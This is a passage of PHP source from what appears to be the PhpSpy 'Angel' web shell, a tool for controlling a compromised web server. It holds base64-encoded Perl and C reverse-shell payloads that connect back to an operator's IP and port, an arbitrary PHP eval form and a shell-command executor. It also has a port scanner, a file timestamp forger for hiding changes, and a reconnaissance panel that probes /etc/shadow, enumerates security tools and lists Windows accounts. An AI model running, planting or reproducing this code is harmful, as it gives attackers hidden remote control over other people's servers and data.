667            p('&lt;p&gt;Current dababase: &lt;a href="javascript:setdb(\''.$dbname.'\');"&gt;'.$dbname.'&lt;/a&gt;');
668            if ($tablename) {
669                p(' | Current Table: &lt;a href="javascript:settable(\''.$tablename.'\');"&gt;'.$tablename.'&lt;/a&gt; [ &lt;a href="javascript:settable(\''.$tablename.'\', \'structure\');"&gt;Structure&lt;/a&gt; ]');
670            }
671            p('&lt;/p&gt;');
672            $sql_query = isset($P['sql_query']) ? $P['sql_query'] : '';
673            if ($tablename &amp;&amp; !$sql_query) {
674                $sql_query = "SELECT * FROM $tablename LIMIT 0, 30";
675            }
676            if ($tablename &amp;&amp; $doing == 'structure') {
677                $sql_query = "SHOW FULL COLUMNS FROM $tablename;\n";
678                $sql_query .= "SHOW INDEX FROM $tablename;";
679            }
680            p('&lt;p&gt;&lt;table width="200" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td colspan="2"&gt;Run SQL query/queries on database '.$dbname.':&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;"&gt;'.htmlspecialchars($sql_query,ENT_QUOTES).'&lt;/textarea&gt;&lt;/td&gt;&lt;td style="padding:0 5px;"&gt;&lt;input class="bt" onclick="$(\'doing\').value=\'\'" style="height:50px;" type="submit" value="Query" /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;');
681            if ($sql_query) {
682                $querys = @explode(';',$sql_query);
683                foreach($querys as $num=&gt;$query) {
684                    if ($query) {
685                        p("&lt;p class=\"red b\"&gt;Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."&lt;/p&gt;");
686                        switch($DB-&gt;query_res($query))
687                        {
688                            case 0:
689                                p('&lt;h2&gt;'.$DB-&gt;halt('Error').'&lt;/h2&gt;');
690                                break;  
691                            case 1:
692                                $result = $DB-&gt;query($query);
693                                $tatol = $DB-&gt;num_rows($result);
694                                p('&lt;table border="0" cellpadding="3" cellspacing="0"&gt;');
695                                p('&lt;tr class="head"&gt;');
696                                $fieldnum = @mysql_num_fields($result);
697                                for($i=0;$i&lt;$fieldnum;$i++){
698                                    p('&lt;td nowrap&gt;'.@mysql_field_name($result, $i).'&lt;/td&gt;');
699                                }
700                                p('&lt;/tr&gt;');
701                                
702                                if (!$tatol) {
703                                    p('&lt;tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"&gt;&lt;td nowrap colspan="'.$fieldnum.'" class="red b"&gt;No records&lt;/td&gt;&lt;/tr&gt;');
704                                } else {
705                                    while($mn = $DB-&gt;fetch($result)){
706                                        $thisbg = bg();
707                                        p('&lt;tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';"&gt;');
708                                        //读取记录用
709                                        foreach($mn as $key=&gt;$inside){
710                                            p('&lt;td nowrap&gt;'.(($inside == null) ? '&lt;i&gt;null&lt;/i&gt;' : html_clean($inside)).'&lt;/td&gt;');
711                                        }
712                                        p('&lt;/tr&gt;');
713                                        unset($b1);
714                                    }
715                                }
716                                p('&lt;/table&gt;');
717                                break;
718                            case 2:
719                                p('&lt;h2&gt;Affected Rows : '.$DB-&gt;affected_rows().'&lt;/h2&gt;');
720                                break;
721                        }
722                    }
723                }
724            } else {
725                $query = $DB-&gt;query("SHOW TABLE STATUS");
726                $table_num = $table_rows = $data_size = 0;
727                $tabledb = array();
728                while($table = $DB-&gt;fetch($query)) {
729                    $data_size = $data_size + $table['Data_length'];
730                    $table_rows = $table_rows + $table['Rows'];
731                    $table_num++;
732                    $tabledb[] = $table;
733                }
734                $data_size = sizecount($data_size);
735                unset($table);
736                if (count($tabledb)) {
737                    if ($highver) {
738                        $db_engine = $DB-&gt;fetch($DB-&gt;query("SHOW VARIABLES LIKE 'storage_engine';"));                     
739                        $db_collation = $DB-&gt;fetch($DB-&gt;query("SHOW VARIABLES LIKE 'collation_database';"));
740                    }
741                    $sort = array('Name', 1);
742                    if($order) {
743                        if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) {
744                            $sort = array($match[1], (int)$match[2]);
745                        }
746                    }
747                    usort($tabledb, 'cmp');
748                    p('&lt;table border="0" cellpadding="0" cellspacing="0" id="lists"&gt;');
749                    p('&lt;tr class="head"&gt;');
750                    p('&lt;td width="2%"&gt;&lt;input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /&gt;&lt;/td&gt;');
751                    p('&lt;td&gt;&lt;a href="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');"&gt;Name&lt;/a&gt; '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'&lt;/td&gt;');
752                    p('&lt;td&gt;&lt;a href="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');"&gt;Rows&lt;/a&gt;'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'&lt;/td&gt;');
753                    p('&lt;td&gt;&lt;a href="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');"&gt;Data_length&lt;/a&gt;'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'&lt;/td&gt;');
754                    p('&lt;td&gt;&lt;a href="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');"&gt;Create_time&lt;/a&gt;'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'&lt;/td&gt;');
755                    p('&lt;td&gt;&lt;a href="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');"&gt;Update_time&lt;/a&gt;'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'&lt;/td&gt;');
756                    if ($highver) {
757                        p('&lt;td&gt;Engine&lt;/td&gt;');
758                        p('&lt;td&gt;Collation&lt;/td&gt;');
759                    }
760                    p('&lt;td&gt;Other&lt;/td&gt;');
761                    p('&lt;/tr&gt;');
762                    foreach ($tabledb as $key =&gt; $table) {
763                        $thisbg = bg();
764                        p('&lt;tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';"&gt;');
765                        p('&lt;td align="center" width="2%"&gt;&lt;input type="checkbox" name="bak_table[]" value="'.$table['Name'].'" /&gt;&lt;/td&gt;');
766                        p('&lt;td&gt;&lt;a href="javascript:settable(\''.$table['Name'].'\');"&gt;'.$table['Name'].'&lt;/a&gt;&lt;/td&gt;');
767                        p('&lt;td&gt;'.$table['Rows'].' &lt;/td&gt;');
768                        p('&lt;td&gt;'.sizecount($table['Data_length']).'&lt;/td&gt;');
769                        p('&lt;td&gt;'.$table['Create_time'].' &lt;/td&gt;');
770                        p('&lt;td&gt;'.$table['Update_time'].' &lt;/td&gt;');
771                        if ($highver) {
772                            p('&lt;td&gt;'.$table['Engine'].'&lt;/td&gt;');
773                            p('&lt;td&gt;'.$table['Collation'].'&lt;/td&gt;');
774                        }
775                        p('&lt;td&gt;&lt;a href="javascript:settable(\''.$table['Name'].'\', \'structure\');"&gt;Structure&lt;/a&gt;&lt;/td&gt;');
776                        p('&lt;/tr&gt;');
777                    }
778                    p('&lt;tr class="head"&gt;');
779                    p('&lt;td width="2%"&gt; &lt;/td&gt;');
780                    p('&lt;td&gt;'.$table_num.' table(s)&lt;/td&gt;');
781                    p('&lt;td&gt;'.$table_rows.'&lt;/td&gt;');
782                    p('&lt;td&gt;'.$data_size.'&lt;/td&gt;');
783                    p('&lt;td&gt; &lt;/td&gt;');
784                    p('&lt;td&gt; &lt;/td&gt;');
785                    if ($highver) {
786                        p('&lt;td&gt;'.$db_engine['Value'].'&lt;/td&gt;');
787                        p('&lt;td&gt;'.$db_collation['Value'].'&lt;/td&gt;');
788                    }
789                    p('&lt;td&gt; &lt;/td&gt;');
790                    p('&lt;/tr&gt;');
791                    p("&lt;tr class=\"".bg()."\"&gt;&lt;td colspan=\"".($highver ? 9 : 7)."\"&gt;&lt;input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /&gt; Save as file &lt;input class=\"input\" name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /&gt; &lt;input class=\"bt\" type=\"button\" value=\"Export selection table\" onclick=\"$('doing').value='dump';$('dbform').submit();\" /&gt;&lt;/td&gt;&lt;/tr&gt;");
792                    p("&lt;/table&gt;");
793                } else {
794                    p('&lt;p class="red b"&gt;No tables&lt;/p&gt;');
795                }
796                $DB-&gt;free_result($query);
797            }
798        }
799        $DB-&gt;close();
800    }
801    formfoot();
802}//end mysql
803elseif ($act == 'backconnect') {
804    !$p2 &amp;&amp; $p2 = $_SERVER['REMOTE_ADDR'];
805    !$p3 &amp;&amp; $p3 = '12345';
806    $usedb = array('perl'=&gt;'perl','c'=&gt;'c');
807    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
808        "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
809        "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
810        "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
811        "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
812        "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
813        "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
814    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
815        "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
816        "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
817        "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
818        "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
819        "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
820        "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
821        "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
822    if ($p1 == 'start' &amp;&amp; $p2 &amp;&amp; $p3 &amp;&amp; $p4){
823        if ($p4 == 'perl') {
824            cf('/tmp/angel_bc',$back_connect);
825            $res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &amp;");
826        } else {
827            cf('/tmp/angel_bc.c',$back_connect_c);
828            $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
829            @unlink('/tmp/angel_bc.c');
830            $res = execute("/tmp/angel_bc ".$p2." ".$p3." &amp;");
831        }
832        m('Now script try connect to '.$p2.':'.$p3.' ...');
833    }
834    formhead(array('title'=&gt;'Back Connect', 'onsubmit'=&gt;'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;'));
835    p('&lt;p&gt;');
836    p('Your IP:');
837    makeinput(array('name'=&gt;'p2','size'=&gt;20,'value'=&gt;$p2));
838    p('Your Port:');
839    makeinput(array('name'=&gt;'p3','size'=&gt;15,'value'=&gt;$p3));
840    p('Use:');
841    makeselect(array('name'=&gt;'p4','option'=&gt;$usedb,'selected'=&gt;$p4));
842    makeinput(array('value'=&gt;'Start','type'=&gt;'submit','class'=&gt;'bt'));
843    p('&lt;/p&gt;');
844    formfoot();
845}//end
846elseif ($act == 'portscan') {
847    !$p2 &amp;&amp; $p2 = '127.0.0.1';
848    !$p3 &amp;&amp; $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
849    formhead(array('title'=&gt;'端口扫描', 'onsubmit'=&gt;'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;'));
850    p('&lt;p&gt;');
851    p('IP:');
852    makeinput(array('name'=&gt;'p2','size'=&gt;20,'value'=&gt;$p2));
853    p('Port:');
854    makeinput(array('name'=&gt;'p3','size'=&gt;80,'value'=&gt;$p3));
855    makeinput(array('value'=&gt;'扫描','type'=&gt;'submit','class'=&gt;'bt'));
856    p('&lt;/p&gt;');
857    formfoot();
858    if ($p1 == 'start') {
859        p('&lt;h2&gt;Result »&lt;/h2&gt;');
860        p('&lt;ul class="info"&gt;');
861        foreach(explode(',', $p3) as $port) {
862            $fp = @fsockopen($p2, $port, $errno, $errstr, 1); 
863            if (!$fp) {
864                p('&lt;li&gt;'.$p2.':'.$port.' ------------------------ &lt;span class="b"&gt;Close&lt;/span&gt;&lt;/li&gt;');
865           } else {
866                p('&lt;li&gt;'.$p2.':'.$port.' ------------------------ &lt;span class="red b"&gt;Open&lt;/span&gt;&lt;/li&gt;');
867                @fclose($fp);
868           } 
869        }
870        p('&lt;/ul&gt;');
871    }
872}
873elseif ($act == 'eval') {
874    $phpcode = trim($p1);
875    if($phpcode){
876        if (!preg_match('#&lt;\?#si', $phpcode)) {
877            $phpcode = "&lt;?php\n\n{$phpcode}\n\n?&gt;";
878        }
879        eval("?"."&gt;$phpcode&lt;?");
880    }
881    formhead(array('title'=&gt;'Eval PHP代码', 'onsubmit'=&gt;'g(\'eval\',null,this.p1.value);return false;'));
882    maketext(array('title'=&gt;'PHP 代码','name'=&gt;'p1', 'value'=&gt;$phpcode));
883    p('&lt;p&gt;&lt;a href="http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/" target="_blank"&gt;获得插件&lt;/a&gt;&lt;/p&gt;');
884    formfooter();
885}//end eval
886elseif ($act == 'editfile') {
887    // 编辑文件
888    if ($p1 == 'edit' &amp;&amp; $p2 &amp;&amp; $p3) {
889        $fp = @fopen($p2,'w');
890        m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
891        @fclose($fp);
892    }
893    $contents = '';
894    if(file_exists($p2)) {
895        $fp=@fopen($p2,'r');
896        $contents=@fread($fp, filesize($p2));
897        @fclose($fp);
898        $contents=htmlspecialchars($contents);
899    }
900    formhead(array('title'=&gt;'创建/编辑文件', 'onsubmit'=&gt;'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;'));
901    makeinput(array('title'=&gt;'文件名:','name'=&gt;'p2','value'=&gt;$p2,'newline'=&gt;1));
902    maketext(array('title'=&gt;'文件内容:','name'=&gt;'p3','value'=&gt;$contents));
903    formfooter();
904    goback();
905}//end editfile
906elseif ($act == 'newtime') {
907    $filemtime = @filemtime($p1);
908    formhead(array('title'=&gt;'Clone folder/file was last modified time', 'onsubmit'=&gt;'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;'));
909    makeinput(array('title'=&gt;'Alter folder/file','name'=&gt;'p2','value'=&gt;$p1,'size'=&gt;120,'newline'=&gt;1));
910    makeinput(array('title'=&gt;'Reference folder/file','name'=&gt;'p3','value'=&gt;$cwd,'size'=&gt;120,'newline'=&gt;1));
911    formfooter();
912    formhead(array('title'=&gt;'Set last modified', 'onsubmit'=&gt;'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;'));
913    makeinput(array('title'=&gt;'Current folder/file','name'=&gt;'p2','value'=&gt;$p1,'size'=&gt;120,'newline'=&gt;1));
914    makeinput(array('title'=&gt;'Modify time','name'=&gt;'p3','value'=&gt;date("Y-m-d H:i:s", $filemtime),'size'=&gt;120,'newline'=&gt;1));
915    formfooter();
916    goback();
917}//end newtime
918elseif ($act == 'shell') {
919    formhead(array('title'=&gt;'执行命令', 'onsubmit'=&gt;'g(\'shell\',null,this.p1.value);return false;'));
920    p('&lt;p&gt;');
921    makeinput(array('name'=&gt;'p1','value'=&gt;htmlspecialchars($p1)));
922    makeinput(array('class'=&gt;'bt','type'=&gt;'submit','value'=&gt;'执行'));
923    p('&lt;/p&gt;');
924    formfoot();
925    if ($p1) {
926        p('&lt;pre&gt;'.execute($p1).'&lt;/pre&gt;');
927    }
928}//end shell
929elseif ($act == 'phpenv') {
930    $d=array();
931    if(function_exists('mysql_get_client_info'))
932        $d[] = "MySql (".mysql_get_client_info().")";
933    if(function_exists('mssql_connect'))
934        $d[] = "MSSQL";
935    if(function_exists('pg_connect'))
936        $d[] = "PostgreSQL";
937    if(function_exists('oci_connect'))
938        $d[] = "Oracle";
939    $info = array(
940        1 =&gt; array('服务器 时间',date('Y/m/d h:i:s',$timestamp)),
941        2 =&gt; array('服务器 域名',$_SERVER['SERVER_NAME']),
942        3 =&gt; array('服务器 IP',gethostbyname($_SERVER['SERVER_NAME'])),
943        4 =&gt; array('服务器 系统',PHP_OS),
944        5 =&gt; array('服务器 系统编码',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
945        6 =&gt; array('服务器 软件',$_SERVER['SERVER_SOFTWARE']),
946        7 =&gt; array('服务器 网站端口',$_SERVER['SERVER_PORT']),
947        8 =&gt; array('PHP 运行方式',strtoupper(php_sapi_name())),
948        9 =&gt; array('文件路径',__FILE__),
949        10 =&gt; array('PHP 版本',PHP_VERSION),
950        11 =&gt; array('PHP信息',(IS_PHPINFO ? '&lt;a href="javascript:g(\'phpinfo\');"&gt;Yes&lt;/a&gt;' : 'No')),
951        12 =&gt; array('安全模式',getcfg('safe_mode')),
952        13 =&gt; array('管理员',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
953        14 =&gt; array('允许url打开',getcfg('allow_url_fopen')),
954        15 =&gt; array('使用dl',getcfg('enable_dl')),
955        16 =&gt; array('显示错误',getcfg('display_errors')),
956        17 =&gt; array('注册全局变量',getcfg('register_globals')),
957        18 =&gt; array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
958        19 =&gt; array('内存限制',getcfg('memory_limit')),
959        20 =&gt; array('post大小',getcfg('post_max_size')),
960        21 =&gt; array('上传文件大小',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')),
961        22 =&gt; array('执行时间',getcfg('max_execution_time').' second(s)'),
962        23 =&gt; array('禁用功能',($dis_func ? $dis_func : 'No')),
963        24 =&gt; array('所支持的数据库',implode(', ', $d)),
964        25 =&gt; array('Curl支持',function_exists('curl_version') ? 'Yes' : 'No'),
965        26 =&gt; array('Open base dir',getcfg('open_basedir')),
966        27 =&gt; array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
967        28 =&gt; array('Safe mode include dir',getcfg('safe_mode_include_dir')),
968    );
969    $hp = array(0=&gt; 'Server', 1=&gt; 'PHP');
970    for($a=0;$a&lt;2;$a++) {
971        p('&lt;h2&gt;'.$hp[$a].' »&lt;/h2&gt;');
972        p('&lt;ul class="info"&gt;');
973        if ($a==0) {
974            for($i=1;$i&lt;=9;$i++) {
975                p('&lt;li&gt;&lt;u&gt;'.$info[$i][0].':&lt;/u&gt;'.$info[$i][1].'&lt;/li&gt;');
976            }
977        } elseif ($a == 1) {
978            for($i=10;$i&lt;=25;$i++) {
979                p('&lt;li&gt;&lt;u&gt;'.$info[$i][0].':&lt;/u&gt;'.$info[$i][1].'&lt;/li&gt;');
980            }
981        }
982        p('&lt;/ul&gt;');
983    }
984}//end phpenv
985elseif ($act == 'secinfo') {
986    
987    if( !IS_WIN ) {
988        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
989        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
990        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
991        secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
992        secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
993        secparam('OS version', @file_get_contents('/proc/version'));
994        secparam('Distr name', @file_get_contents('/etc/issue.net'));
995        $safe_mode = @ini_get('safe_mode');
996        if(!$GLOBALS['safe_mode']) {
997            $temp=array();
998            foreach ($userful as $item)
999                if(which($item)){$temp[]=$item;}
1000            secparam('Userful', implode(', ',$temp));
1001            $temp=array();
1002            foreach ($danger as $item)
1003                if(which($item)){$temp[]=$item;}
1004            secparam('Danger', implode(', ',$temp));
1005            $temp=array();
1006            foreach ($downloaders as $item) 
1007                if(which($item)){$temp[]=$item;}
1008            secparam('Downloaders', implode(', ',$temp));
1009            secparam('Hosts', @file_get_contents('/etc/hosts'));
1010            secparam('HDD space', execute('df -h'));
1011            secparam('Mount options', @file_get_contents('/etc/fstab'));
1012        }
1013    } else {
1014        secparam('OS Version',execute('ver'));
1015        secparam('Account Settings',execute('net accounts'));
1016        secparam('User Accounts',execute('net user'));
1017        secparam('IP Configurate',execute('ipconfig -all'));
1018    }
1019}//end
1020else {
1021    m('未定义的行动');
1022}
1023?&gt;
1024&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
1025&lt;div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;"&gt;
1026    &lt;span style="float:right;"&gt;
1027    &lt;?php
1028    debuginfo();
1029    ob_end_flush();
1030    if (isset($DB)) {
1031        echo '. '.$DB-&gt;querycount.' queries';
1032    }
1033    ?&gt;
1034    &lt;/span&gt;
1035.
1036&lt;/div&gt;
1037&lt;/body&gt;
1038&lt;/html&gt;
1039&lt;?php
1040/*======================================================
1041函数库
1042======================================================*/
1043function secparam($n, $v) {
1044    $v = trim($v);
1045    if($v) {
1046        p('&lt;h2&gt;'.$n.' »&lt;/h2&gt;');
1047        p('&lt;div class="infolist"&gt;');
1048        if(strpos($v, "\n") === false)
1049            p($v.'&lt;br /&gt;');
1050        else
1051            p('&lt;pre&gt;'.$v.'&lt;/pre&gt;');
1052        p('&lt;/div&gt;');
1053    }
1054}
1055function m($msg) {
1056    echo '&lt;div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;"&gt;';
1057    echo $msg;
1058    echo '&lt;/div&gt;';
1059}
1060function s_array($array) {
1061    return is_array($array) ? array_map('s_array', $array) : stripslashes($array);
1062}
1063function scookie($key, $value, $life = 0, $prefix = 1) {
1064    global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1065    $key = ($prefix ? $cookiepre : '').$key;
1066    $life = $life ? $life : $cookielife;
1067    $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1068    setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1069}
1070function loginpage() {
1071    formhead();
1072    makehide('act','login');
1073    makeinput(array('name'=&gt;'password','type'=&gt;'password','size'=&gt;'20'));
1074    makeinput(array('type'=&gt;'submit','value'=&gt;'登录'));
1075    formfoot();
1076    exit;
1077}
1078function execute($cfe) {
1079    $res = '';
1080    if ($cfe) {
1081        if(function_exists('system')) {
1082            @ob_start();
1083            @system($cfe);
1084            $res = @ob_get_contents();
1085            @ob_end_clean();
1086        } elseif(function_exists('passthru')) {
1087            @ob_start();
1088            @passthru($cfe);
1089            $res = @ob_get_contents();
1090            @ob_end_clean();
1091        } elseif(function_exists('shell_exec')) {
1092            $res = @shell_exec($cfe);
1093        } elseif(function_exists('exec')) {
1094            @exec($cfe,$res);
1095            $res = join("\n",$res);
1096        } elseif(@is_resource($f = @popen($cfe,"r"))) {
1097            $res = '';
1098            while(!@feof($f)) {
1099                $res .= @fread($f,1024); 
1100            }
1101            @pclose($f);
1102        }
1103    }
1104    return $res;
1105}
1106function which($pr) {
1107    $path = execute("which $pr");
1108    return ($path ? $path : $pr); 
1109}
1110function cf($fname,$text){
1111    if($fp=@fopen($fname,'w')) {
1112        @fputs($fp,@base64_decode($text));
1113        @fclose($fp);
1114    }
1115}
1116function dirsize($cwd) { 
1117    $dh = @opendir($cwd);
1118    $size = 0;
1119    while($file = @readdir($dh)) {
1120        if ($file != '.' &amp;&amp; $file != '..') {
1121            $path = $cwd.'/'.$file;
1122            $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));
1123        }
1124    }
1125    @closedir($dh);
1126    return $size;
1127}
1128// 页面调试信息
1129function debuginfo() {
1130    global $starttime;
1131    $mtime = explode(' ', microtime());
1132    $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1133    echo 'Processed in '.$totaltime.' second(s)';
1134}
1135// 清除HTML代码
1136function html_clean($content) {
1137    $content = htmlspecialchars($content);
1138    $content = str_replace("\n", "&lt;br /&gt;", $content);
1139    $content = str_replace("  ", "  ", $content);
1140    $content = str_replace("\t", "    ", $content);
1141    return $content;
1142}
1143// 获取权限
1144function getChmod($file){
1145    return substr(base_convert(@fileperms($file),10,8),-4);
1146}
1147function PermsColor($f) { 
1148    if (!is_readable($f)) {
1149        return '&lt;span class="red"&gt;'.getPerms($f).'&lt;/span&gt;';
1150    } elseif (!is_writable($f)) {
1151        return '&lt;span class="black"&gt;'.getPerms($f).'&lt;/span&gt;';
1152    } else {
1153        return '&lt;span class="green"&gt;'.getPerms($f).'&lt;/span&gt;';
1154    }
1155}
1156function getPerms($file) {
1157    $mode = @fileperms($file);
1158    if (($mode &amp; 0xC000) === 0xC000) {$type = 's';}
1159    elseif (($mode &amp; 0x4000) === 0x4000) {$type = 'd';}
1160    elseif (($mode &amp; 0xA000) === 0xA000) {$type = 'l';}
1161    elseif (($mode &amp; 0x8000) === 0x8000) {$type = '-';} 
1162    elseif (($mode &amp; 0x6000) === 0x6000) {$type = 'b';}
1163    elseif (($mode &amp; 0x2000) === 0x2000) {$type = 'c';}
1164    elseif (($mode &amp; 0x1000) === 0x1000) {$type = 'p';}
1165    else {$type = '?';}
1166    $owner['read'] = ($mode &amp; 00400) ? 'r' : '-'; 
1167    $owner['write'] = ($mode &amp; 00200) ? 'w' : '-'; 
1168    $owner['execute'] = ($mode &amp; 00100) ? 'x' : '-'; 
1169    $group['read'] = ($mode &amp; 00040) ? 'r' : '-'; 
1170    $group['write'] = ($mode &amp; 00020) ? 'w' : '-'; 
1171    $group['execute'] = ($mode &amp; 00010) ? 'x' : '-'; 
1172    $world['read'] = ($mode &amp; 00004) ? 'r' : '-'; 
1173    $world['write'] = ($mode &amp; 00002) ? 'w' : '-'; 
1174    $world['execute'] = ($mode &amp; 00001) ? 'x' : '-'; 
1175    if( $mode &amp; 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1176    if( $mode &amp; 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1177    if( $mode &amp; 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1178 
1179    return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1180}
1181function getUser($file) {
1182    if (function_exists('posix_getpwuid')) {
1183        $array = @posix_getpwuid(@fileowner($file));
1184        if ($array &amp;&amp; is_array($array)) {
1185            return ' / &lt;a href="#" title="User: '.$array['name'].'&amp;#13&amp;#10Passwd: '.$array['passwd'].'&amp;#13&amp;#10Uid: '.$array['uid'].'&amp;#13&amp;#10gid: '.$array['gid'].'&amp;#13&amp;#10Gecos: '.$array['gecos'].'&amp;#13&amp;#10Dir: '.$array['dir'].'&amp;#13&amp;#10Shell: '.$array['shell'].'"&gt;'.$array['name'].'&lt;/a&gt;';
1186        }
1187    }
1188    return '';
1189}
1190function copy_paste($c,$f,$d){
1191    if(is_dir($c.$f)){
1192        mkdir($d.$f);
1193        $dirs = scandir($c.$f);
1194        if ($dirs) {
1195            $dirs = array_diff($dirs, array('..', '.'));
1196            foreach ($dirs as $file) {
1197                copy_paste($c.$f.'/',$file, $d.$f.'/');
1198            }
1199        }
1200    } elseif(is_file($c.$f)) {
1201        copy($c.$f, $d.$f);
1202    }
1203}
1204// 删除目录
1205function deltree($deldir) {
1206    $dirs = @scandir($deldir);
1207    if ($dirs) {
